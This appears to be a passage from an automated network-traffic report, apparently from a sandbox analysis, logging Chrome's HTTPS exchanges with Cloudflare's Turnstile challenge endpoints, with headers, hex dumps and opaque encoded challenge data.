                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:33 UTC200INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:33 GMT
                                                                  Content-Type: image/png
                                                                  Content-Length: 61
                                                                  Connection: close
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d306e6f8ccd-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:33 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 03 00 00 00 0e 08 02 00 00 00 65 d4 31 36 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                  Data Ascii: PNGIHDRe16IDAT$IENDB`


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.449778104.18.95.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:33 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/90189d18db7dc411/1736805151193/BfLhLnbiO9Yqi-I HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:34 UTC200INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:33 GMT
                                                                  Content-Type: image/png
                                                                  Content-Length: 61
                                                                  Connection: close
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d343e1f7291-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:34 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 03 00 00 00 0e 08 02 00 00 00 65 d4 31 36 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                  Data Ascii: PNGIHDRe16IDAT$IENDB`


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.449779104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:34 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1422477146:1736802990:9RTko5tCoC4k8VUcTFwt3F207OMr2t22jLnzo16lWnM/90189d18db7dc411/SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 32083
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Content-type: application/x-www-form-urlencoded
                                                                  CF-Chl-RetryAttempt: 0
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  CF-Challenge: SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://challenges.cloudflare.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:34 UTC16384OUTData Raw: 76 5f 39 30 31 38 39 64 31 38 64 62 37 64 63 34 31 31 3d 6e 66 62 32 4a 47 61 55 4c 39 66 41 66 41 74 66 61 7a 61 39 67 6a 7a 67 47 35 61 43 37 41 65 32 38 25 32 62 41 68 41 56 41 50 62 61 75 41 70 39 59 6a 7a 4c 47 73 41 63 47 41 52 6a 32 42 52 75 41 66 32 7a 66 41 31 39 6d 32 47 64 41 67 36 32 55 6a 61 41 47 66 41 79 41 62 66 41 38 52 6e 62 61 71 32 32 37 4f 61 44 6a 69 7a 6d 32 73 41 6e 42 66 61 56 41 76 62 41 43 6b 47 39 32 77 38 41 37 6a 47 4e 72 45 38 68 32 32 41 52 50 41 52 78 62 41 61 49 36 2d 32 61 70 48 6a 41 56 78 33 39 4e 2d 58 50 24 41 51 67 70 7a 32 73 4c 68 56 73 41 47 45 7a 70 7a 79 52 6f 78 69 32 41 4f 46 43 71 41 62 47 7a 78 33 32 41 6a 36 52 36 61 50 2b 49 56 69 6d 36 79 39 43 47 66 49 2d 41 33 6a 31 4e 57 6a 65 4d 36 71 6b 57 4c 63 50
                                                                  Data Ascii: v_90189d18db7dc411=nfb2JGaUL9fAfAtfaza9gjzgG5aC7Ae28%2bAhAVAPbauAp9YjzLGsAcGARj2BRuAf2zfA19m2GdAg62UjaAGfAyAbfA8Rnbaq227OaDjizm2sAnBfaVAvbACkG92w8A7jGNrE8h22ARPARxbAaI6-2apHjAVx39N-XP$AQgpz2sLhVsAGEzpzyRoxi2AOFCqAbGzx32Aj6R6aP+IVim6y9CGfI-A3j1NWjeM6qkWLcP
                                                                  2025-01-13 21:52:34 UTC15699OUTData Raw: 67 41 51 32 78 36 5a 32 61 74 52 2d 41 47 41 73 32 6f 2b 51 57 47 4c 41 50 4f 61 6a 6a 6a 37 55 41 38 32 6e 32 51 4a 32 61 41 4f 6a 52 7a 41 4b 7a 38 6a 47 67 61 46 2b 7a 41 41 74 61 49 41 79 6a 41 39 61 67 41 39 41 50 6a 6d 70 41 78 2b 50 34 41 4c 41 61 2b 37 48 41 46 6a 6e 64 36 62 41 33 2b 54 41 61 50 32 2b 66 55 2b 61 4a 32 7a 41 55 68 61 66 6d 67 41 55 6a 52 34 4b 44 63 78 6a 52 41 61 58 4c 7a 62 41 78 61 44 41 39 4d 37 67 61 63 4f 7a 32 47 57 41 41 32 72 6a 52 49 61 2d 41 66 2b 37 4c 47 39 6a 38 32 62 4f 52 65 2d 6f 32 6e 4f 52 75 41 4d 6a 41 4c 47 4e 41 32 78 50 66 47 41 32 64 32 79 7a 47 6a 41 76 32 76 4f 47 75 41 4a 32 39 6c 57 71 41 58 32 79 41 41 24 41 4d 6a 6e 42 47 6d 41 6d 6a 6e 6a 41 62 67 54 66 50 6a 61 4b 74 39 73 51 4d 57 35 41 5a 47 41
                                                                  Data Ascii: gAQ2x6Z2atR-AGAs2o+QWGLAPOajjj7UA82n2QJ2aAOjRzAKz8jGgaF+zAAtaIAyjA9agA9APjmpAx+P4ALAa+7HAFjnd6bA3+TAaP2+fU+aJ2zAUhafmgAUjR4KDcxjRAaXLzbAxaDA9M7gacOz2GWAA2rjRIa-Af+7LG9j82bORe-o2nORuAMjALGNA2xPfGA2d2yzGjAv2vOGuAJ29lWqAX2yAA$AMjnBGmAmjnjAbgTfPjaKt9sQMW5AZGA
                                                                  2025-01-13 21:52:34 UTC322INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:52:34 GMT
                                                                  Content-Type: text/plain; charset=UTF-8
                                                                  Content-Length: 26332
                                                                  Connection: close
                                                                  cf-chl-gen: y01QJ4AnA25e7man8fZ2eU8LQyPnGfkypvJc/BB5aV1Oaz3+3beoySm0WpAfMR6k$jmZKc4v4z9hX2EWkedYP6g==
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d36ecba43d0-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:34 UTC1047INData Raw: 63 30 78 65 64 56 61 57 61 49 39 73 64 58 43 56 61 70 4f 58 6c 35 4e 5a 6e 71 52 33 67 5a 36 6f 65 34 56 30 6e 34 4b 4a 66 4a 47 42 67 59 4a 76 6f 36 5a 79 72 34 53 54 71 62 6c 39 64 63 42 34 6a 71 2b 6a 6b 61 4b 36 77 36 43 71 71 4c 2b 6d 72 5a 32 67 75 73 6d 4c 72 4e 57 53 6e 37 4f 5a 6f 71 54 49 79 64 2b 35 33 4c 50 55 32 73 4b 39 33 71 66 47 6e 39 62 61 37 64 61 6b 36 38 79 38 78 64 33 6b 39 4f 54 52 79 39 44 45 30 4f 32 31 75 38 76 77 2f 75 76 43 7a 2f 37 66 2b 41 6a 63 33 41 33 55 78 4f 58 61 34 65 58 73 7a 65 58 69 31 74 50 31 2b 41 67 52 31 66 41 62 36 68 67 66 36 76 76 31 44 77 49 54 34 77 6b 66 41 43 77 4d 37 51 55 50 36 69 77 53 2f 68 44 32 45 69 63 6c 43 77 59 33 4e 67 34 62 48 54 45 54 4d 30 51 30 50 69 49 70 42 67 67 55 43 41 67 72 52 68 46
                                                                  Data Ascii: c0xedVaWaI9sdXCVapOXl5NZnqR3gZ6oe4V0n4KJfJGBgYJvo6Zyr4STqbl9dcB4jq+jkaK6w6CqqL+mrZ2gusmLrNWSn7OZoqTIyd+53LPU2sK93qfGn9ba7dak68y8xd3k9OTRy9DE0O21u8vw/uvCz/7f+Ajc3A3UxOXa4eXszeXi1tP1+AgR1fAb6hgf6vv1DwIT4wkfACwM7QUP6iwS/hD2EiclCwY3Ng4bHTETM0Q0PiIpBggUCAgrRhF
                                                                  2025-01-13 21:52:34 UTC1369INData Raw: 36 6a 31 71 6f 6b 36 79 6b 6d 32 43 5a 67 6e 74 2f 69 4a 43 52 6f 4a 56 78 69 4c 4f 6a 66 49 2b 76 6b 37 69 2f 66 72 54 46 70 4b 57 42 74 72 4f 6e 6e 70 57 59 75 6f 6e 47 78 64 47 4f 6f 62 50 4b 30 35 43 74 71 74 62 58 73 37 43 2f 33 61 32 39 77 64 48 6a 34 37 44 64 34 4c 4f 6a 34 4c 36 32 36 38 66 53 76 73 50 44 73 63 76 43 30 38 76 7a 2b 4c 66 6c 75 4e 48 55 33 4e 66 52 31 62 7a 68 43 50 73 4a 2b 73 54 37 2b 2b 63 50 42 73 67 46 34 65 6f 4c 46 77 77 4c 42 64 58 6e 42 78 51 51 47 76 33 59 41 78 38 5a 4a 2b 2f 37 4a 75 62 6b 41 50 34 5a 2b 65 38 78 2b 75 77 6e 37 75 34 78 4c 53 62 33 39 51 33 32 43 42 63 52 4f 52 67 77 45 7a 4c 38 47 30 52 49 53 6a 59 65 44 45 77 4e 4b 54 30 78 4c 67 38 2f 4b 53 78 45 4c 78 51 6e 4f 6a 30 36 46 7a 6b 7a 47 6c 55 38 54 56
                                                                  Data Ascii: 6j1qok6ykm2CZgnt/iJCRoJVxiLOjfI+vk7i/frTFpKWBtrOnnpWYuonGxdGOobPK05CtqtbXs7C/3a29wdHj47Dd4LOj4L6268fSvsPDscvC08vz+LfluNHU3NfR1bzhCPsJ+sT7++cPBsgF4eoLFwwLBdXnBxQQGv3YAx8ZJ+/7JubkAP4Z+e8x+uwn7u4xLSb39Q32CBcRORgwEzL8G0RISjYeDEwNKT0xLg8/KSxELxQnOj06FzkzGlU8TV
                                                                  2025-01-13 21:52:34 UTC1369INData Raw: 65 59 69 50 69 59 36 62 63 49 4b 55 68 4c 4f 71 73 4c 42 32 69 5a 70 33 69 4c 47 2f 6e 62 71 6a 73 73 53 61 73 5a 71 46 74 36 76 42 78 61 6d 72 79 61 58 48 72 70 53 67 71 71 50 51 30 61 50 64 33 70 71 33 75 37 6d 72 7a 35 61 66 6e 74 57 79 71 4b 6d 7a 6f 71 72 44 76 73 66 4b 77 63 37 6d 36 2f 54 7a 30 4e 72 47 78 74 53 36 2b 65 6a 56 31 41 4c 6b 42 75 37 32 39 50 45 46 77 63 76 6d 39 64 7a 33 32 50 4c 74 42 74 54 2b 45 65 6f 49 37 50 58 72 47 76 49 4e 33 68 2f 30 33 74 33 30 33 74 6a 76 48 4f 49 55 39 42 34 50 35 78 45 47 45 78 45 6b 42 52 66 76 4b 41 38 31 37 43 55 55 4d 51 30 49 38 76 73 5a 49 7a 6a 38 51 79 63 69 4a 67 56 43 4a 51 55 2b 55 43 59 67 53 55 5a 4b 4b 51 34 6a 51 30 78 57 53 79 35 62 4c 53 42 64 46 45 78 53 55 30 4e 69 50 56 35 53 48 57 6c
                                                                  Data Ascii: eYiPiY6bcIKUhLOqsLB2iZp3iLG/nbqjssSasZqFt6vBxamryaXHrpSgqqPQ0aPd3pq3u7mrz5afntWyqKmzoqrDvsfKwc7m6/Tz0NrGxtS6+ejV1ALkBu729PEFwcvm9dz32PLtBtT+EeoI7PXrGvIN3h/03t303tjvHOIU9B4P5xEGExEkBRfvKA817CUUMQ0I8vsZIzj8QyciJgVCJQU+UCYgSUZKKQ4jQ0xWSy5bLSBdFExSU0NiPV5SHWl
                                                                  2025-01-13 21:52:34 UTC1369INData Raw: 32 74 79 64 57 6d 47 6f 6f 65 4c 6b 48 6d 61 6a 61 69 38 74 38 53 32 65 38 58 44 67 37 2b 66 68 34 4b 72 71 49 69 6e 6e 61 69 2f 74 59 32 4f 6c 63 47 69 6b 74 54 57 75 71 32 56 75 64 58 55 6e 74 2b 67 30 75 44 5a 70 37 2f 67 31 2b 53 32 35 61 6a 4e 73 4d 61 39 37 38 72 73 78 66 72 4e 74 50 7a 37 31 38 6e 49 38 64 6e 58 31 39 43 34 33 4f 50 6d 32 41 59 47 37 41 6e 33 2f 51 55 4a 7a 75 34 57 41 66 58 56 37 4e 44 37 47 65 33 6e 37 67 6f 66 32 78 50 39 42 50 37 79 4a 68 4d 72 2b 78 62 34 47 2f 34 44 2f 67 2f 37 37 53 77 68 42 77 6f 54 37 41 77 58 2b 76 67 58 4f 6a 41 2f 4c 55 4d 67 42 42 49 42 52 68 4d 45 48 79 77 6e 50 55 59 76 51 56 46 50 51 78 63 73 57 6a 56 4c 4b 6a 30 64 47 43 6b 32 55 6d 45 31 50 6b 63 67 49 31 74 6d 54 46 67 34 4a 31 78 66 5a 54 42 65
                                                                  Data Ascii: 2tydWmGooeLkHmajai8t8S2e8XDg7+fh4KrqIinnai/tY2OlcGiktTWuq2VudXUnt+g0uDZp7/g1+S25ajNsMa978rsxfrNtPz718nI8dnX19C43OPm2AYG7An3/QUJzu4WAfXV7ND7Ge3n7gof2xP9BP7yJhMr+xb4G/4D/g/77SwhBwoT7AwX+vgXOjA/LUMgBBIBRhMEHywnPUYvQVFPQxcsWjVLKj0dGCk2UmE1PkcgI1tmTFg4J1xfZTBe
                                                                  2025-01-13 21:52:34 UTC1369INData Raw: 57 48 6c 71 6c 34 76 34 69 79 71 35 7a 45 6b 5a 78 2b 65 72 6d 55 66 5a 32 62 72 37 36 75 70 63 79 4e 78 4e 61 49 72 74 4c 61 6a 4e 54 49 6d 70 43 71 30 4b 37 4d 31 4a 72 66 6e 37 71 37 32 4f 72 6f 71 5a 2f 47 76 63 6a 61 73 72 36 74 73 2f 61 77 37 50 72 62 30 38 69 31 2f 64 79 2b 39 66 62 31 33 65 33 31 30 72 6f 44 43 66 76 43 78 75 76 64 37 73 66 62 43 51 30 4a 41 2b 33 30 34 67 67 48 37 74 6e 58 45 41 30 67 38 75 44 64 49 4f 51 43 33 79 4c 6f 39 52 38 6a 36 65 7a 73 4a 68 7a 6c 4c 44 59 67 41 6a 41 31 44 50 6a 79 4d 2f 77 57 48 6a 63 58 47 69 4e 47 42 41 55 45 51 43 78 49 4e 6a 38 4e 47 68 46 4d 53 6b 51 30 54 46 42 46 49 6b 39 53 4d 68 31 55 57 42 6c 51 56 7a 64 67 47 32 4e 52 4d 7a 74 71 4a 68 35 4e 61 6a 38 6d 52 47 39 54 4c 6a 35 77 4e 57 41 78 62
                                                                  Data Ascii: WHlql4v4iyq5zEkZx+ermUfZ2br76upcyNxNaIrtLajNTImpCq0K7M1Jrfn7q72OroqZ/Gvcjasr6ts/aw7Prb08i1/dy+9fb13e310roDCfvCxuvd7sfbCQ0JA+304ggH7tnXEA0g8uDdIOQC3yLo9R8j6ezsJhzlLDYgAjA1DPjyM/wWHjcXGiNGBAUEQCxINj8NGhFMSkQ0TFBFIk9SMh1UWBlQVzdgG2NRMztqJh5Naj8mRG9TLj5wNWAxb
                                                                  2025-01-13 21:52:34 UTC1369INData Raw: 73 6c 48 74 39 77 36 36 48 71 62 57 5a 77 35 65 36 78 4b 32 43 77 4d 66 4b 6c 4d 4b 50 79 36 54 4a 6c 4e 4c 54 79 72 37 50 72 2b 43 78 76 71 2f 66 34 4d 47 6d 35 65 50 4a 36 74 6a 43 32 4c 37 74 36 2f 4f 76 38 4d 69 7a 72 2f 4c 5a 35 4d 58 32 74 76 4b 37 37 66 6a 59 74 76 54 76 78 4e 62 31 41 4d 50 43 39 65 37 70 34 2f 30 48 42 39 51 47 35 67 58 6b 46 74 6a 78 32 51 6a 74 2b 52 30 62 48 41 7a 57 49 2f 6b 6c 38 79 51 6c 42 65 55 73 46 2b 38 53 48 67 49 73 41 43 4d 74 46 75 6f 70 4d 44 50 38 4b 2f 63 30 44 54 4c 38 4f 7a 77 7a 4a 7a 67 59 53 52 6f 6d 53 55 64 49 54 41 35 50 54 43 6f 51 51 43 70 51 46 6c 59 75 47 52 52 61 4d 7a 63 70 54 56 30 79 59 6b 52 47 56 79 5a 59 4a 53 6b 36 61 32 56 52 4c 6c 39 53 4e 47 78 6c 52 33 4d 32 59 6c 6f 31 54 57 30 2b 57 6a
                                                                  Data Ascii: slHt9w66HqbWZw5e6xK2CwMfKlMKPy6TJlNLTyr7Pr+Cxvq/f4MGm5ePJ6tjC2L7t6/Ov8Mizr/LZ5MX2tvK77fjYtvTvxNb1AMPC9e7p4/0HB9QG5gXkFtjx2Qjt+R0bHAzWI/kl8yQlBeUsF+8SHgIsACMtFuopMDP8K/c0DTL8OzwzJzgYSRomSUdITA5PTCoQQCpQFlYuGRRaMzcpTV0yYkRGVyZYJSk6a2VRLl9SNGxlR3M2Ylo1TW0+Wj
                                                                  2025-01-13 21:52:34 UTC1369INData Raw: 68 4d 53 7a 78 4a 54 4a 6a 4d 50 52 7a 4d 76 50 69 39 48 50 7a 39 6e 56 6d 61 57 61 32 4e 65 31 6d 74 32 67 76 61 44 67 7a 2b 65 6e 35 37 33 6e 37 65 6a 42 31 36 6e 73 36 2b 2b 7a 38 4c 54 30 77 50 58 7a 39 37 54 34 35 77 43 39 2f 50 76 33 76 67 50 61 30 63 55 47 33 66 66 46 43 4d 7a 37 79 51 2f 6c 43 4d 77 55 36 52 44 51 46 67 51 63 31 78 6e 78 44 43 49 65 48 43 48 73 49 69 41 43 35 53 66 39 49 4f 73 71 4b 43 44 75 4c 76 48 39 38 44 49 77 4a 44 6f 31 4a 44 44 37 4f 52 4a 41 41 45 41 57 4f 41 46 43 47 6a 51 42 52 55 51 38 42 55 6b 34 54 52 6c 4f 50 45 41 54 55 56 42 59 45 6c 55 5a 4e 68 74 5a 53 53 6f 64 58 56 78 6b 4a 47 4a 51 56 43 5a 6c 50 6d 77 6f 62 45 4a 67 4d 47 77 78 5a 43 39 78 59 48 52 36 64 30 35 54 52 58 70 34 58 6a 74 2b 56 6e 78 42 67 6e 42
                                                                  Data Ascii: hMSzxJTJjMPRzMvPi9HPz9nVmaWa2Ne1mt2gvaDgz+en573n7ejB16ns6++z8LT0wPXz97T45wC9/Pv3vgPa0cUG3ffFCMz7yQ/lCMwU6RDQFgQc1xnxDCIeHCHsIiAC5Sf9IOsqKCDuLvH98DIwJDo1JDD7ORJAAEAWOAFCGjQBRUQ8BUk4TRlOPEATUVBYElUZNhtZSSodXVxkJGJQVCZlPmwobEJgMGwxZC9xYHR6d05TRXp4Xjt+VnxBgnB
                                                                  2025-01-13 21:52:34 UTC1369INData Raw: 5a 69 39 30 4d 61 50 77 37 44 4b 6f 71 61 35 78 4c 4b 6b 78 64 47 73 31 4c 79 68 75 71 7a 4e 73 37 54 63 78 4b 6e 43 74 4d 7a 6d 72 2b 50 76 76 37 44 78 34 65 44 51 35 50 66 4e 39 4d 66 59 38 2f 54 4d 34 50 7a 4e 77 67 4c 77 33 4e 37 31 39 4f 54 34 44 4f 45 49 7a 52 44 52 33 50 34 50 30 42 48 6b 2b 42 58 6b 45 42 30 54 39 50 59 44 39 67 55 59 41 52 73 44 39 67 72 70 41 2f 51 4e 4a 2b 38 65 4d 41 44 6c 4d 68 59 4c 41 53 63 7a 38 77 73 46 48 69 63 41 2f 55 45 52 46 77 30 6c 4d 52 38 52 4b 6b 4d 4d 50 6b 77 64 4a 6b 34 7a 4a 78 31 48 54 78 41 33 49 54 74 44 48 42 70 64 4c 42 6f 70 51 54 63 35 59 6b 35 45 4e 69 68 46 4b 43 77 71 62 54 31 50 4f 56 70 51 51 6a 52 52 4e 6b 39 42 59 6c 68 4b 4f 31 6b 38 51 44 36 42 55 56 39 4e 62 6d 52 57 52 32 56 4b 59 31 56 32
                                                                  Data Ascii: Zi90MaPw7DKoqa5xLKkxdGs1LyhuqzNs7TcxKnCtMzmr+Pvv7Dx4eDQ5PfN9MfY8/TM4PzNwgLw3N719OT4DOEIzRDR3P4P0BHk+BXkEB0T9PYD9gUYARsD9grpA/QNJ+8eMADlMhYLAScz8wsFHicA/UERFw0lMR8RKkMMPkwdJk4zJx1HTxA3ITtDHBpdLBopQTc5Yk5ENihFKCwqbT1POVpQQjRRNk9BYlhKO1k8QD6BUV9NbmRWR2VKY1V2


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.449780104.18.95.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:35 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1422477146:1736802990:9RTko5tCoC4k8VUcTFwt3F207OMr2t22jLnzo16lWnM/90189d18db7dc411/SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:35 UTC375INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 13 Jan 2025 21:52:35 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 7
                                                                  Connection: close
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  cf-chl-out: 5p99meyCrwKyrQHVkdDt/g==$n2O6z5R72Eq4IcQsv6UXnQ==
                                                                  Server: cloudflare
                                                                  CF-RAY: 90189d3c5c720f98-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:52:35 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                  Data Ascii: invalid


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.449781104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:39 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1422477146:1736802990:9RTko5tCoC4k8VUcTFwt3F207OMr2t22jLnzo16lWnM/90189d18db7dc411/SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 34525
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Content-type: application/x-www-form-urlencoded
                                                                  CF-Chl-RetryAttempt: 0
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  CF-Challenge: SRkucuaSX3vQiM1w7nq42R7TuFk1Bzs.dYiE18NVXHY-1736805149-1.1.1.1-nL_3Z4PBc74LqvnDGCtO5peGYrbJKKyNb8KtjtqJMyWacOJZM8kQ9Dve5o0ISwEM
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://challenges.cloudflare.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/grybg/0x4AAAAAAA4pnGQDZ108QgTx/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:39 UTC16384OUTData Raw: 76 5f 39 30 31 38 39 64 31 38 64 62 37 64 63 34 31 31 3d 6e 66 62 32 4a 47 61 55 4c 39 66 41 66 41 74 66 61 7a 61 39 67 6a 7a 67 47 35 61 43 37 41 65 32 38 25 32 62 41 68 41 56 41 50 62 61 75 41 70 39 59 6a 7a 4c 47 73 41 63 47 41 52 6a 32 42 52 75 41 66 32 7a 66 41 31 39 6d 32 47 64 41 67 36 32 55 6a 61 41 47 66 41 79 41 62 66 41 38 52 6e 62 61 71 32 32 37 4f 61 44 6a 69 7a 6d 32 73 41 6e 42 66 61 56 41 76 62 41 43 6b 47 39 32 77 38 41 37 6a 47 4e 72 45 38 68 32 32 41 52 50 41 52 78 62 41 61 49 36 2d 32 61 70 48 6a 41 56 78 33 39 4e 2d 58 50 24 41 51 67 70 7a 32 73 4c 68 56 73 41 47 45 7a 70 7a 79 52 6f 78 69 32 41 4f 46 43 71 41 62 47 7a 78 33 32 41 6a 36 52 36 61 50 2b 49 56 69 6d 36 79 39 43 47 66 49 2d 41 33 6a 31 4e 57 6a 65 4d 36 71 6b 57 4c 63 50
                                                                  Data Ascii: v_90189d18db7dc411=nfb2JGaUL9fAfAtfaza9gjzgG5aC7Ae28%2bAhAVAPbauAp9YjzLGsAcGARj2BRuAf2zfA19m2GdAg62UjaAGfAyAbfA8Rnbaq227OaDjizm2sAnBfaVAvbACkG92w8A7jGNrE8h22ARPARxbAaI6-2apHjAVx39N-XP$AQgpz2sLhVsAGEzpzyRoxi2AOFCqAbGzx32Aj6R6aP+IVim6y9CGfI-A3j1NWjeM6qkWLcP
                                                                  2025-01-13 21:52:39 UTC16384OUTData Raw: 67 41 51 32 78 36 5a 32 61 74 52 2d 41 47 41 73 32 6f 2b 51 57 47 4c 41 50 4f 61 6a 6a 6a 37 55 41 38 32 6e 32 51 4a 32 61 41 4f 6a 52 7a 41 4b 7a 38 6a 47 67 61 46 2b 7a 41 41 74 61 49 41 79 6a 41 39 61 67 41 39 41 50 6a 6d 70 41 78 2b 50 34 41 4c 41 61 2b 37 48 41 46 6a 6e 64 36 62 41 33 2b 54 41 61 50 32 2b 66 55 2b 61 4a 32 7a 41 55 68 61 66 6d 67 41 55 6a 52 34 4b 44 63 78 6a 52 41 61 58 4c 7a 62 41 78 61 44 41 39 4d 37 67 61 63 4f 7a 32 47 57 41 41 32 72 6a 52 49 61 2d 41 66 2b 37 4c 47 39 6a 38 32 62 4f 52 65 2d 6f 32 6e 4f 52 75 41 4d 6a 41 4c 47 4e 41 32 78 50 66 47 41 32 64 32 79 7a 47 6a 41 76 32 76 4f 47 75 41 4a 32 39 6c 57 71 41 58 32 79 41 41 24 41 4d 6a 6e 42 47 6d 41 6d 6a 6e 6a 41 62 67 54 66 50 6a 61 4b 74 39 73 51 4d 57 35 41 5a 47 41
